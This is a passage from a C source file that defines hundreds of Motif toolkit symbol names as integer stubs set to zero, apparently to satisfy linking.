int _XmSdropSiteOperations = 0;
|
||||
int _XmSdropSiteType = 0;
|
||||
int _XmSdropStartCallback = 0;
|
||||
int _XmSdropTransferClass = 0;
|
||||
int _XmSdropTransfers = 0;
|
||||
int _XmSearchColorCache = 0;
|
||||
int _XmSecondaryResourceData = 0;
|
||||
int _XmSeditable = 0;
|
||||
int _XmSeditMode = 0;
|
||||
int _XmSelectColorDefault = 0;
|
||||
int _XmSelectioB_defaultTextAccelerators = 0;
|
||||
int xmSelectionBoxClassRec = 0;
|
||||
int _XmSelectionBoxCreateApplyButton = 0;
|
||||
int _XmSelectionBoxCreateCancelButton = 0;
|
||||
int _XmSelectionBoxCreateHelpButton = 0;
|
||||
int _XmSelectionBoxCreateList = 0;
|
||||
int _XmSelectionBoxCreateListLabel = 0;
|
||||
int _XmSelectionBoxCreateOkButton = 0;
|
||||
int _XmSelectionBoxCreateSelectionLabel = 0;
|
||||
int _XmSelectionBoxCreateSeparator = 0;
|
||||
int _XmSelectionBoxCreateText = 0;
|
||||
int _XmSelectionBoxGeoMatrixCreate = 0;
|
||||
int _XmSelectionBoxGetApplyLabelString = 0;
|
||||
int _XmSelectionBoxGetCancelLabelString = 0;
|
||||
int XmSelectionBoxGetChild = 0;
|
||||
int _XmSelectionBoxGetHelpLabelString = 0;
|
||||
int _XmSelectionBoxGetListItemCount = 0;
|
||||
int _XmSelectionBoxGetListItems = 0;
|
||||
int _XmSelectionBoxGetListLabelString = 0;
|
||||
int _XmSelectionBoxGetListVisibleItemCount = 0;
|
||||
int _XmSelectionBoxGetOkLabelString = 0;
|
||||
int _XmSelectionBoxGetSelectionLabelString = 0;
|
||||
int _XmSelectionBoxGetTextColumns = 0;
|
||||
int _XmSelectionBoxGetTextString = 0;
|
||||
int _XmSelectionBoxNoGeoRequest = 0;
|
||||
int _XmSelectionBoxRestore = 0;
|
||||
int _XmSelectionBoxUpOrDown = 0;
|
||||
int xmSelectionBoxWidgetClass = 0;
|
||||
int _XmSEMPTY_STRING = 0;
|
||||
int _XmSendICCCallback = 0;
|
||||
int _XmSentryAlignment = 0;
|
||||
int _XmSentryBorder = 0;
|
||||
int _XmSentryCallback = 0;
|
||||
int _XmSentryClass = 0;
|
||||
int _XmSentryVerticalAlignment = 0;
|
||||
int _XmSeparatorCacheCompare = 0;
|
||||
int xmSeparatorClassRec = 0;
|
||||
int _XmSeparatorFix = 0;
|
||||
int xmSeparatorGadgetClass = 0;
|
||||
int xmSeparatorGadgetClassRec = 0;
|
||||
int xmSeparatorGCacheObjClassRec = 0;
|
||||
int xmSeparatorWidgetClass = 0;
|
||||
int _XmSetActiveTabGroup = 0;
|
||||
int _XmSetActualClass = 0;
|
||||
int XmSetColorCalculation = 0;
|
||||
int _XmSetDefaultBackgroundColorSpec = 0;
|
||||
int _XmSetDestination = 0;
|
||||
int _XmSetDragReceiverInfo = 0;
|
||||
int _XmSetEtchedSlider = 0;
|
||||
int _XmSetFocusFlag = 0;
|
||||
int _XmSetFocusResetFlag = 0;
|
||||
int XmSetFontUnit = 0;
|
||||
int XmSetFontUnits = 0;
|
||||
int _XmSetInDragMode = 0;
|
||||
int _XmSetInitialOfTabGraph = 0;
|
||||
int _XmSetInitialOfTabGroup = 0;
|
||||
int _XmSetKidGeo = 0;
|
||||
int _XmSetLastManagedMenuTime = 0;
|
||||
int XmSetMenuCursor = 0;
|
||||
int _XmSetMenuTraversal = 0;
|
||||
int _XmSetPopupMenuClick = 0;
|
||||
int XmSetProtocolHooks = 0;
|
||||
int _XmSetRect = 0;
|
||||
int _XmSetSwallowEventHandler = 0;
|
||||
int _XmSetThickness = 0;
|
||||
int _XmSetThicknessDefault0 = 0;
|
||||
int XmSetToolTipString = 0;
|
||||
int _XmSetTransientFlag = 0;
|
||||
int _XmSetValuesOnChildren = 0;
|
||||
int _XmSetXmDisplayClass = 0;
|
||||
int _XmSexportTargets = 0;
|
||||
int _XmSexposeCallback = 0;
|
||||
int _XmSextendedSelectionCallback = 0;
|
||||
int _XmSextensionType = 0;
|
||||
int _XmSFAddNavigator = 0;
|
||||
int _XmSfileListItemCount = 0;
|
||||
int _XmSfileListItems = 0;
|
||||
int _XmSfileListLabelString = 0;
|
||||
int _XmSfileSearchProc = 0;
|
||||
int _XmSfileTypeMask = 0;
|
||||
int _XmSfillOnArm = 0;
|
||||
int _XmSfillOnSelect = 0;
|
||||
int _XmSfilterLabelString = 0;
|
||||
int _XmSfocusCallback = 0;
|
||||
int _XmSfocusMovedCallback = 0;
|
||||
int _XmSfocusPolicyChanged = 0;
|
||||
int _XmSfontList = 0;
|
||||
int _XmSforegroundThreshold = 0;
|
||||
int _XmSfractionBase = 0;
|
||||
int _XmSFRemoveNavigator = 0;
|
||||
int _XmSFUpdateNavigatorsValue = 0;
|
||||
int _XmSgainPrimaryCallback = 0;
|
||||
int xmShellExtClassRec = 0;
|
||||
int xmShellExtObjectClass = 0;
|
||||
int _XmShellIsExclusive = 0;
|
||||
int _XmShelpCallback = 0;
|
||||
int _XmShelpLabelString = 0;
|
||||
int _XmShighlightColor = 0;
|
||||
int _XmShighlightOnEnter = 0;
|
||||
int _XmShighlightPixmap = 0;
|
||||
int _XmShighlightThickness = 0;
|
||||
int _XmShistoryItemCount = 0;
|
||||
int _XmShistoryItems = 0;
|
||||
int _XmShistoryMaxItems = 0;
|
||||
int _XmShistoryVisibleItemCount = 0;
|
||||
int _XmShorizontalFontUnit = 0;
|
||||
int _XmShorizontalScrollBar = 0;
|
||||
int _XmShorizontalSpacing = 0;
|
||||
int _XmShotX = 0;
|
||||
int _XmShotY = 0;
|
||||
int _XmSiccHandle = 0;
|
||||
int XmSimpleSpinBoxAddItem = 0;
|
||||
int xmSimpleSpinBoxClassRec = 0;
|
||||
int XmSimpleSpinBoxDeletePos = 0;
|
||||
int XmSimpleSpinBoxSetItem = 0;
|
||||
int xmSimpleSpinBoxWidgetClass = 0;
|
||||
int _XmSimportTargets = 0;
|
||||
int _XmSincrement = 0;
|
||||
int _XmSincremental = 0;
|
||||
int _XmSincrementCallback = 0;
|
||||
int _XmSindicatorOn = 0;
|
||||
int _XmSindicatorSize = 0;
|
||||
int _XmSindicatorType = 0;
|
||||
int _XmSinitialDelay = 0;
|
||||
int _XmSinitialFocus = 0;
|
||||
int _XmSinputCallback = 0;
|
||||
int _XmSinputCreate = 0;
|
||||
int _XmSinputMethod = 0;
|
||||
int _XmSinvalidCursorForeground = 0;
|
||||
int _XmSisAligned = 0;
|
||||
int _XmSisHomogeneous = 0;
|
||||
int _XmSitemCount = 0;
|
||||
int _XmSitems = 0;
|
||||
int _XmSkeyboardFocusPolicy = 0;
|
||||
int _XmSlabelFontList = 0;
|
||||
int _XmSlabelInsensitivePixmap = 0;
|
||||
int _XmSlabelPixmap = 0;
|
||||
int _XmSlabelString = 0;
|
||||
int _XmSlabelType = 0;
|
||||
int _XmSleep = 0;
|
||||
int _XmSleftAttachment = 0;
|
||||
int _XmSleftOffset = 0;
|
||||
int _XmSleftPosition = 0;
|
||||
int _XmSleftWidget = 0;
|
||||
int xmSlideContextClassRec = 0;
|
||||
int xmSlideContextWidgetClass = 0;
|
||||
int _XmSlightThreshold = 0;
|
||||
int _XmSlistItemCount = 0;
|
||||
int _XmSlistItems = 0;
|
||||
int _XmSlistLabelString = 0;
|
||||
int _XmSlistMarginHeight = 0;
|
||||
int _XmSlistMarginWidth = 0;
|
||||
int _XmSlistSizePolicy = 0;
|
||||
int _XmSlistSpacing = 0;
|
||||
int _XmSlistUpdated = 0;
|
||||
int _XmSlistVisibleItemCount = 0;
|
||||
int _XmSlogicalParent = 0;
|
||||
int _XmSlosePrimaryCallback = 0;
|
||||
int _XmSlosingFocusCallback = 0;
|
||||
int _XmSmainWindowMarginHeight = 0;
|
||||
int _XmSmainWindowMarginWidth = 0;
|
||||
int _XmSmapCallback = 0;
|
||||
int _XmSmappingDelay = 0;
|
||||
int _XmSmargin = 0;
|
||||
int _XmSmarginBottom = 0;
|
||||
int _XmSmarginHeight = 0;
|
||||
int _XmSmarginLeft = 0;
|
||||
int _XmSmarginRight = 0;
|
||||
int _XmSmarginTop = 0;
|
||||
int _XmSmarginWidth = 0;
|
||||
int _XmSmask = 0;
|
||||
int _XmSmaximum = 0;
|
||||
int _XmSmaxLength = 0;
|
||||
int _XmSmenuAccelerator = 0;
|
||||
int _XmSmenuBar = 0;
|
||||
int _XmSmenuCursor = 0;
|
||||
int _XmSmenuHelpWidget = 0;
|
||||
int _XmSmenuHistory = 0;
|
||||
int _XmSmenuPost = 0;
|
||||
int _XmSmessageAlignment = 0;
|
||||
int _XmSmessageProc = 0;
|
||||
int _XmSmessageString = 0;
|
||||
int _XmSmessageWindow = 0;
|
||||
int _XmSminimizeButtons = 0;
|
||||
int _XmSminimum = 0;
|
||||
int _XmSmnemonic = 0;
|
||||
int _XmSmnemonicCharSet = 0;
|
||||
int _XmSmodifyVerifyCallback = 0;
|
||||
int _XmSmodifyVerifyCallbackWcs = 0;
|
||||
int _XmSmotionVerifyCallback = 0;
|
||||
int _XmSmoveOpaque = 0;
|
||||
int _XmSmultiClick = 0;
|
||||
int _XmSmultipleSelectionCallback = 0;
|
||||
int _XmSmustMatch = 0;
|
||||
int _XmSmwmDecorations = 0;
|
||||
int _XmSmwmFunctions = 0;
|
||||
int _XmSmwmInputMode = 0;
|
||||
int _XmSmwmMenu = 0;
|
||||
int _XmSmwmMessages = 0;
|
||||
int _XmSnavigationType = 0;
|
||||
int _XmSneedsMotion = 0;
|
||||
int _XmSnoMatchCallback = 0;
|
||||
int _XmSnoMatchString = 0;
|
||||
int _XmSnoneCursorForeground = 0;
|
||||
int _XmSnoResize = 0;
|
||||
int _XmSnotifyProc = 0;
|
||||
int _XmSnumColumns = 0;
|
||||
int _XmSnumDropRectangles = 0;
|
||||
int _XmSnumDropTransfers = 0;
|
||||
int _XmSnumExportTargets = 0;
|
||||
int _XmSnumImportTargets = 0;
|
||||
int _XmSnumRectangles = 0;
|
||||
int _XmSocorro = 0;
|
||||
int _XmSoffsetX = 0;
|
||||
int _XmSoffsetY = 0;
|
||||
int _XmSokCallback = 0;
|
||||
int _XmSokLabelString = 0;
|
||||
int _XmSoperationChangedCallback = 0;
|
||||
int _XmSoperationCursorIcon = 0;
|
||||
int _XmSoptionLabel = 0;
|
||||
int _XmSoptionMnemonic = 0;
|
||||
int _XmSortResourceList = 0;
|
||||
int _XmSosfActivate = 0;
|
||||
int _XmSosfAddMode = 0;
|
||||
int _XmSosfBackSpace = 0;
|
||||
int _XmSosfBeginLine = 0;
|
||||
int _XmSosfCancel = 0;
|
||||
int _XmSosfClear = 0;
|
||||
int _XmSosfCopy = 0;
|
||||
int _XmSosfCut = 0;
|
||||
int _XmSosfDelete = 0;
|
||||
int _XmSosfDown = 0;
|
||||
int _XmSosfEndLine = 0;
|
||||
int _XmSosfHelp = 0;
|
||||
int _XmSosfInsert = 0;
|
||||
int _XmSosfLeft = 0;
|
||||
int _XmSosfMenu = 0;
|
||||
int _XmSosfMenuBar = 0;
|
||||
int _XmSosfPageDown = 0;
|
||||
int _XmSosfPageLeft = 0;
|
||||
int _XmSosfPageRight = 0;
|
||||
int _XmSosfPageUp = 0;
|
||||
int _XmSosfPaste = 0;
|
||||
int _XmSosfPrimaryPaste = 0;
|
||||
int _XmSosfQuickPaste = 0;
|
||||
int _XmSosfRight = 0;
|
||||
int _XmSosfSelect = 0;
|
||||
int _XmSosfUndo = 0;
|
||||
int _XmSosfUp = 0;
|
||||
int _XmSoutputCreate = 0;
|
||||
int _XmSpacking = 0;
|
||||
int _XmSpageDecrementCallback = 0;
|
||||
int _XmSpageIncrement = 0;
|
||||
int _XmSpageIncrementCallback = 0;
|
||||
int _XmSpaneMaximum = 0;
|
||||
int _XmSpaneMinimum = 0;
|
||||
int _XmSpattern = 0;
|
||||
int _XmSpendingDelete = 0;
|
||||
int _XmSpinB_defaultAccelerators = 0;
|
||||
int _XmSpinB_defaultTranslations = 0;
|
||||
int xmSpinBoxClassRec = 0;
|
||||
int XmSpinBoxValidatePosition = 0;
|
||||
int xmSpinBoxWidgetClass = 0;
|
||||
int _XmSpopupEnabled = 0;
|
||||
int _XmSpositionIndex = 0;
|
||||
int _XmSpostFromButton = 0;
|
||||
int _XmSpostFromCount = 0;
|
||||
int _XmSpostFromList = 0;
|
||||
int _XmSpreeditType = 0;
|
||||
int _XmSprocessingDirection = 0;
|
||||
int _XmSpromptString = 0;
|
||||
int _XmSprotocolCallback = 0;
|
||||
int _XmSpushButton = 0;
|
||||
int _XmSpushButtonEnabled = 0;
|
||||
int _XmSqualifySearchDataProc = 0;
|
||||
int _XmSradioAlwaysOne = 0;
|
||||
int _XmSradioBehavior = 0;
|
||||
int _XmSradioButton = 0;
|
||||
int _XmSrealizeCallback = 0;
|
||||
int _XmSrecomputeSize = 0;
|
||||
int _XmSrectangles = 0;
|
||||
int _XmSrefigureMode = 0;
|
||||
int _XmSrepeatDelay = 0;
|
||||
int _XmSresizable = 0;
|
||||
int _XmSresizeCallback = 0;
|
||||
int _XmSresizeHeight = 0;
|
||||
int _XmSresizePolicy = 0;
|
||||
int _XmSresizeWidth = 0;
|
||||
int _XmSrightAttachment = 0;
|
||||
int _XmSrightOffset = 0;
|
||||
int _XmSrightPosition = 0;
|
||||
int _XmSrightWidget = 0;
|
||||
int _XmSrowColumnType = 0;
|
||||
int _XmSrows = 0;
|
||||
int _XmSrubberPositioning = 0;
|
||||
int _XmSsashHeight = 0;
|
||||
int _XmSsashIndent = 0;
|
||||
int _XmSsashShadowThickness = 0;
|
||||
int _XmSsashWidth = 0;
|
||||
int _XmSscaleHeight = 0;
|
||||
int _XmSscaleMultiple = 0;
|
||||
int _XmSscaleWidth = 0;
|
||||
int _XmSscrollBarDisplayPolicy = 0;
|
||||
int _XmSscrollBarPlacement = 0;
|
||||
int _XmSscrolledWindowMarginHeight = 0;
|
||||
int _XmSscrolledWindowMarginWidth = 0;
|
||||
int _XmSscrollHorizontal = 0;
|
||||
int _XmSscrollingPolicy = 0;
|
||||
int _XmSscrollLeftSide = 0;
|
||||
int _XmSscrollTopSide = 0;
|
||||
int _XmSscrollVertical = 0;
|
||||
int _XmSselectColor = 0;
|
||||
int _XmSselectedItemCount = 0;
|
||||
int _XmSselectedItems = 0;
|
||||
int _XmSselectInsensitivePixmap = 0;
|
||||
int _XmSselectionArrayCount = 0;
|
||||
int _XmSselectionLabelString = 0;
|
||||
int _XmSselectionPolicy = 0;
|
||||
int _XmSselectPixmap = 0;
|
||||
int _XmSselectThreshold = 0;
|
||||
int _XmSseparator = 0;
|
||||
int _XmSseparatorOn = 0;
|
||||
int _XmSseparatorType = 0;
|
||||
int _XmSset = 0;
|
||||
int _XmSshadow = 0;
|
||||
int _XmSshadowThickness = 0;
|
||||
int _XmSshadowType = 0;
|
||||
int _XmSshellUnitType = 0;
|
||||
int _XmSshowArrows = 0;
|
||||
int _XmSshowAsDefault = 0;
|
||||
int _XmSshowSeparator = 0;
|
||||
int _XmSshowValue = 0;
|
||||
int _XmSsimpleCallback = 0;
|
||||
int _XmSsingleSelectionCallback = 0;
|
||||
int _XmSsingleSeparator = 0;
|
||||
int _XmSsizePolicy = 0;
|
||||
int _XmSskipAdjust = 0;
|
||||
int _XmSsliderSize = 0;
|
||||
int _XmSsource = 0;
|
||||
int _XmSsourceCursorIcon = 0;
|
||||
int _XmSsourceIsExternal = 0;
|
||||
int _XmSsourcePixmapIcon = 0;
|
||||
int _XmSsourceWidget = 0;
|
||||
int _XmSsourceWindow = 0;
|
||||
int _XmSspacing = 0;
|
||||
int _XmSstartTime = 0;
|
||||
int _XmSstateCursorIcon = 0;
|
||||
int _XmSstringDirection = 0;
|
||||
int _XmSsubMenuId = 0;
|
||||
int _XmSsymbolPixmap = 0;
|
||||
int _XmStackFree = 0;
|
||||
int _XmStackInit = 0;
|
||||
int _XmStackPop = 0;
|
||||
int _XmStackPush = 0;
|
||||
int xm_std_constraint_filter = 0;
|
||||
int xm_std_filter = 0;
|
||||
int _XmStearOffMenuActivateCallback = 0;
|
||||
int _XmStearOffMenuDeactivateCallback = 0;
|
||||
int _XmStearOffModel = 0;
|
||||
int _XmStextAccelerators = 0;
|
||||
int _XmStextColumns = 0;
|
||||
int _XmStextFontList = 0;
|
||||
int _XmStextString = 0;
|
||||
int _XmStextTranslations = 0;
|
||||
int _XmStextValue = 0;
|
||||
int _XmStitleString = 0;
|
||||
int _XmStoBottomCallback = 0;
|
||||
int _XmStopAttachment = 0;
|
||||
int _XmStopCharacter = 0;
|
||||
int _XmStopItemPosition = 0;
|
||||
int _XmStopLevelEnterCallback = 0;
|
||||
int _XmStopLevelLeaveCallback = 0;
|
||||
int _XmStopOffset = 0;
|
||||
int _XmStoPositionCallback = 0;
|
||||
int _XmStopPosition = 0;
|
||||
int _XmStopShadowColor = 0;
|
||||
int _XmStopShadowPixmap = 0;
|
||||
int _XmStopWidget = 0;
|
||||
int _XmStoTopCallback = 0;
|
||||
int _XmStransferProc = 0;
|
||||
int _XmStransferStatus = 0;
|
||||
int _XmStraversalCallback = 0;
|
||||
int _XmStraversalOn = 0;
|
||||
int _XmStraversalType = 0;
|
||||
int _XmStraverseObscuredCallback = 0;
|
||||
int _XmStreeUpdateProc = 0;
|
||||
int _XmStringBaseline = 0;
|
||||
int XmStringBaseline = 0;
|
||||
int _XmStringByteCompare = 0;
|
||||
int XmStringByteCompare = 0;
|
||||
int XmStringByteStreamLength = 0;
|
||||
int _XmStringCacheFree = 0;
|
||||
int _XmStringCacheGet = 0;
|
||||
int _XmStringCacheTag = 0;
|
||||
int _XmStringCharacterCount = 0;
|
||||
int XmStringCompare = 0;
|
||||
int XmStringComponentCreate = 0;
|
||||
int XmStringConcat = 0;
|
||||
int XmStringConcatAndFree = 0;
|
||||
int _XmStringContextCopy = 0;
|
||||
int _XmStringContextFree = 0;
|
||||
int _XmStringContextReInit = 0;
|
||||
int _XmStringCopy = 0;
|
||||
int XmStringCopy = 0;
|
||||
int _XmStringCreate = 0;
|
||||
int XmStringCreate = 0;
|
||||
int _XmStringCreateExternal = 0;
|
||||
int XmStringCreateFontList = 0;
|
||||
int XmStringCreateFontList_r = 0;
|
||||
int XmStringCreateLocalized = 0;
|
||||
int XmStringCreateLtoR = 0;
|
||||
int XmStringCreateSimple = 0;
|
||||
int XmStringDirectionCreate = 0;
|
||||
int XmStringDirectionToDirection = 0;
|
||||
int _XmStringDraw = 0;
|
||||
int XmStringDraw = 0;
|
||||
int _XmStringDrawImage = 0;
|
||||
int XmStringDrawImage = 0;
|
||||
int _XmStringDrawLining = 0;
|
||||
int _XmStringDrawMnemonic = 0;
|
||||
int _XmStringDrawSegment = 0;
|
||||
int _XmStringDrawUnderline = 0;
|
||||
int XmStringDrawUnderline = 0;
|
||||
int _XmStringEmpty = 0;
|
||||
int XmStringEmpty = 0;
|
||||
int _XmStringEntryCopy = 0;
|
||||
int _XmStringEntryFree = 0;
|
||||
int _XmStringExtent = 0;
|
||||
int XmStringExtent = 0;
|
||||
int _XmStringFree = 0;
|
||||
int XmStringFree = 0;
|
||||
int _XmStringFreeContext = 0;
|
||||
int XmStringFreeContext = 0;
|
||||
int XmStringGenerate = 0;
|
||||
int _XmStringGetBaselines = 0;
|
||||
int _XmStringGetCurrentCharset = 0;
|
||||
int XmStringGetLtoR = 0;
|
||||
int XmStringGetNextComponent = 0;
|
||||
int _XmStringGetNextSegment = 0;
|
||||
int XmStringGetNextSegment = 0;
|
||||
int _XmStringGetNextTabWidth = 0;
|
||||
int XmStringGetNextTriple = 0;
|
||||
int _XmStringGetSegment = 0;
|
||||
int _XmStringGetTextConcat = 0;
|
||||
int _XmStringHasSubstring = 0;
|
||||
int XmStringHasSubstring = 0;
|
||||
int _XmStringHeight = 0;
|
||||
int XmStringHeight = 0;
|
||||
int _XmStringIndexCacheTag = 0;
|
||||
int _XmStringIndexGetTag = 0;
|
||||
int _XmStringInitContext = 0;
|
||||
int XmStringInitContext = 0;
|
||||
int _XmStringIsCurrentCharset = 0;
|
||||
int XmStringIsVoid = 0;
|
||||
int _XmStringIsXmString = 0;
|
||||
int _XmStringLayout = 0;
|
||||
int XmStringLength = 0;
|
||||
int _XmStringLineCount = 0;
|
||||
int XmStringLineCount = 0;
|
||||
int XmStringLtoRCreate = 0;
|
||||
int XmStringNConcat = 0;
|
||||
int XmStringNCopy = 0;
|
||||
int _XmStringNCreate = 0;
|
||||
int _XmStringOptToNonOpt = 0;
|
||||
int XmStringParseText = 0;
|
||||
int XmStringPeekNextComponent = 0;
|
||||
int XmStringPeekNextTriple = 0;
|
||||
int XmStringPutRendition = 0;
|
||||
int _XmStringRender = 0;
|
||||
int _XmStrings = 0;
|
||||
int _XmStrings22 = 0;
|
||||
int _XmStrings23 = 0;
|
||||
int _XmStringsAreEqual = 0;
|
||||
int XmStringSegmentCreate = 0;
|
||||
int _XmStringSegmentExtents = 0;
|
||||
int _XmStringSegmentNew = 0;
|
||||
int XmStringSeparatorCreate = 0;
|
||||
int _XmStringsI = 0;
|
||||
int _XmStringSingleSegment = 0;
|
||||
int _XmStringSourceCreate = 0;
|
||||
int _XmStringSourceDestroy = 0;
|
||||
int _XmStringSourceFindString = 0;
|
||||
int _XmStringSourceGetEditable = 0;
|
||||
int _XmStringSourceGetMaxLength = 0;
|
||||
int _XmStringSourceGetPending = 0;
|
||||
int _XmStringSourceGetString = 0;
|
||||
int _XmStringSourceGetValue = 0;
|
||||
int _XmStringSourceHasSelection = 0;
|
||||
int _XmStringSourceSetEditable = 0;
|
||||
int _XmStringSourceSetGappedBuffer = 0;
|
||||
int _XmStringSourceSetMaxLength = 0;
|
||||
int _XmStringSourceSetPending = 0;
|
||||
int _XmStringSourceSetValue = 0;
|
||||
int XmStringTableParseStringArray = 0;
|
||||
int XmStringTableProposeTablist = 0;
|
||||
int XmStringTableToXmString = 0;
|
||||
int XmStringTableUnparse = 0;
|
||||
int XmStringToXmStringTable = 0;
|
||||
int _XmStringTruncateASN1 = 0;
|
||||
int _XmStringUngenerate = 0;
|
||||
int XmStringUnparse = 0;
|
||||
int _XmStringUpdate = 0;
|
||||
int _XmStringUpdateWMShellTitle = 0;
|
||||
int _XmStringWidth = 0;
|
||||
int XmStringWidth = 0;
|
||||
int _XmStroughColor = 0;
|
||||
int _XmSunitType = 0;
|
||||
int _XmSunmapCallback = 0;
|
||||
int _XmSunpostBehavior = 0;
|
||||
int _XmSunselectPixmap = 0;
|
||||
int _XmSupdateSliderSize = 0;
|
||||
int _XmSuseAsyncGeometry = 0;
|
||||
int _XmSuserData = 0;
|
||||
int _XmSvalidCursorForeground = 0;
|
||||
int _XmSvalueChangedCallback = 0;
|
||||
int _XmSvalueWcs = 0;
|
||||
int _XmSverifyBell = 0;
|
||||
int _XmSverticalFontUnit = 0;
|
||||
int _XmSverticalScrollBar = 0;
|
||||
int _XmSverticalSpacing = 0;
|
||||
int _XmSvisibleItemCount = 0;
|
||||
int _XmSvisibleWhenOff = 0;
|
||||
int _XmSvisualPolicy = 0;
|
||||
int _XmSWGetClipArea = 0;
|
||||
int _XmSwhichButton = 0;
|
||||
int _XmSWNotifyGeoChange = 0;
|
||||
int _XmSwordWrap = 0;
|
||||
int _XmSworkWindow = 0;
|
||||
int _XmSyncDropSiteTree = 0;
|
||||
int XmTabAttributesFree = 0;
|
||||
int XmTabbedStackListAppend = 0;
|
||||
int _XmTabbedStackListArray = 0;
|
||||
int XmTabbedStackListCompare = 0;
|
||||
int XmTabbedStackListCopy = 0;
|
||||
int _XmTabbedStackListCount = 0;
|
||||
int XmTabbedStackListCreate = 0;
|
||||
int XmTabbedStackListFind = 0;
|
||||
int XmTabbedStackListFree = 0;
|
||||
int _XmTabbedStackListGet = 0;
|
||||
int XmTabbedStackListInsert = 0;
|
||||
int XmTabbedStackListModify = 0;
|
||||
int XmTabbedStackListQuery = 0;
|
||||
int XmTabbedStackListRemove = 0;
|
||||
int XmTabbedStackListSimpleAppend = 0;
|
||||
int XmTabbedStackListSimpleInsert = 0;
|
||||
int XmTabbedStackListSimpleModify = 0;
|
||||
int XmTabbedStackListSimpleQuery = 0;
|
||||
int XmTabbedStackListSimpleRemove = 0;
|
||||
int _XmTabBoxCanvas = 0;
|
||||
int xmTabBoxClassRec = 0;
|
||||
int XmTabBoxGetIndex = 0;
|
||||
int _XmTabBoxGetMaxTabHeight = 0;
|
||||
int _XmTabBoxGetMaxTabWidth = 0;
|
||||
int XmTabBoxGetNumColumns = 0;
|
||||
int XmTabBoxGetNumRows = 0;
|
||||
int _XmTabBoxGetNumRowsColumns = 0;
|
||||
int XmTabBoxGetNumTabs = 0;
|
||||
int _XmTabBoxGetTabHeight = 0;
|
||||
int XmTabBoxGetTabRow = 0;
|
||||
int _XmTabBoxGetTabWidth = 0;
|
||||
int _XmTabBoxSelectTab = 0;
|
||||
int _XmTabBoxStackedGeometry = 0;
|
||||
int xmTabBoxWidgetClass = 0;
|
||||
int XmTabBoxXYToIndex = 0;
|
||||
int xmTabCanvasClassRec = 0;
|
||||
int xmTabCanvasWidgetClass = 0;
|
||||
int _XmTabCopy = 0;
|
||||
int XmTabCreate = 0;
|
||||
int XmTabFree = 0;
|
||||
int XmTabGetValues = 0;
|
||||
int _XmTabListAdd = 0;
|
||||
int XmTabListCopy = 0;
|
||||
int _XmTabListDelete = 0;
|
||||
int XmTabListFree = 0;
|
||||
int _XmTabListGetPosition = 0;
|
||||
int XmTabListGetTab = 0;
|
||||
int XmTabListInsertTabs = 0;
|
||||
int XmTabListRemoveTabs = 0;
|
||||
int XmTabListReplacePositions = 0;
|
||||
int XmTabListTabCount = 0;
|
||||
int XmTabSetValue = 0;
|
||||
int xmTabStackClassRec = 0;
|
||||
int XmTabStackGetSelectedTab = 0;
|
||||
int XmTabStackIndexToWidget = 0;
|
||||
int XmTabStackSelectTab = 0;
|
||||
int xmTabStackWidgetClass = 0;
|
||||
int XmTargetsAreCompatible = 0;
|
||||
int _XmTargetsToIndex = 0;
|
||||
int _XmTearOffB_overrideTranslations = 0;
|
||||
int _XmTearOffBPrimClassExtRec = 0;
|
||||
int _XmTearOffBtnDownEventHandler = 0;
|
||||
int _XmTearOffBtnUpEventHandler = 0;
|
||||
int xmTearOffButtonClassRec = 0;
|
||||
int xmTearOffButtonWidgetClass = 0;
|
||||
int _XmTearOffInitiate = 0;
|
||||
int _XmTestTraversability = 0;
|
||||
int _XmTextAdjustGC = 0;
|
||||
int _XmTextBytesToCharacters = 0;
|
||||
int _XmTextChangeBlinkBehavior = 0;
|
||||
int _XmTextChangeHOffset = 0;
|
||||
int _XmTextChangeVOffset = 0;
|
||||
int _XmTextCharactersToBytes = 0;
|
||||
int xmTextClassRec = 0;
|
||||
int _XmTextClearDestination = 0;
|
||||
int XmTextClearSelection = 0;
|
||||
int _XmTextConvert = 0;
|
||||
int XmTextCopy = 0;
|
||||
int XmTextCopyLink = 0;
|
||||
int _XmTextCountCharacters = 0;
|
||||
int XmTextCut = 0;
|
||||
int _XmTextDestinationVisible = 0;
|
||||
int _XmTextDisableRedisplay = 0;
|
||||
int XmTextDisableRedisplay = 0;
|
||||
int _XmTextDrawDestination = 0;
|
||||
int _XmTextEnableRedisplay = 0;
|
||||
int XmTextEnableRedisplay = 0;
|
||||
int _XmTextEventBindings1 = 0;
|
||||
int _XmTextEventBindings2 = 0;
|
||||
int _XmTextEventBindings3 = 0;
|
||||
int _XmTextF_EventBindings1 = 0;
|
||||
int _XmTextF_EventBindings2 = 0;
|
||||
int _XmTextF_EventBindings3 = 0;
|
||||
int xmTextFieldClassRec = 0;
|
||||
int XmTextFieldClearSelection = 0;
|
||||
int _XmTextFieldConvert = 0;
|
||||
int XmTextFieldCopy = 0;
|
||||
int XmTextFieldCopyLink = 0;
|
||||
int _XmTextFieldCountBytes = 0;
|
||||
int _XmTextFieldCountCharacters = 0;
|
||||
int XmTextFieldCut = 0;
|
||||
int _XmTextFieldDeselectSelection = 0;
|
||||
int _XmTextFieldDestinationVisible = 0;
|
||||
int _XmTextFieldDrawInsertionPoint = 0;
|
||||
int XmTextFieldGetAddMode = 0;
|
||||
int XmTextFieldGetBaseline = 0;
|
||||
int XmTextFieldGetBaseLine = 0;
|
||||
int XmTextFieldGetCursorPosition = 0;
|
||||
int _XmTextFieldGetDropReciever = 0;
|
||||
int XmTextFieldGetEditable = 0;
|
||||
int XmTextFieldGetInsertionPosition = 0;
|
||||
int XmTextFieldGetLastPosition = 0;
|
||||
int XmTextFieldGetMaxLength = 0;
|
||||
int XmTextFieldGetSelection = 0;
|
||||
int XmTextFieldGetSelectionPosition = 0;
|
||||
int XmTextFieldGetSelectionWcs = 0;
|
||||
int XmTextFieldGetString = 0;
|
||||
int XmTextFieldGetStringWcs = 0;
|
||||
int XmTextFieldGetSubstring = 0;
|
||||
int XmTextFieldGetSubstringWcs = 0;
|
||||
int _XmTextFieldHandleSecondaryFinished = 0;
|
||||
int XmTextFieldInsert = 0;
|
||||
int XmTextFieldInsertWcs = 0;
|
||||
int _XmTextFieldInstallTransferTrait = 0;
|
||||
int _XmTextFieldLoseSelection = 0;
|
||||
int XmTextFieldPaste = 0;
|
||||
int XmTextFieldPasteLink = 0;
|
||||
int XmTextFieldPosToXY = 0;
|
||||
int XmTextFieldRemove = 0;
|
||||
int XmTextFieldReplace = 0;
|
||||
int _XmTextFieldReplaceText = 0;
|
||||
int XmTextFieldReplaceWcs = 0;
|
||||
int XmTextFieldSetAddMode = 0;
|
||||
int _XmTextFieldSetClipRect = 0;
|
||||
int _XmTextFieldSetCursorPosition = 0;
|
||||
int XmTextFieldSetCursorPosition = 0;
|
||||
int _XmTextFieldSetDestination = 0;
|
||||
int XmTextFieldSetEditable = 0;
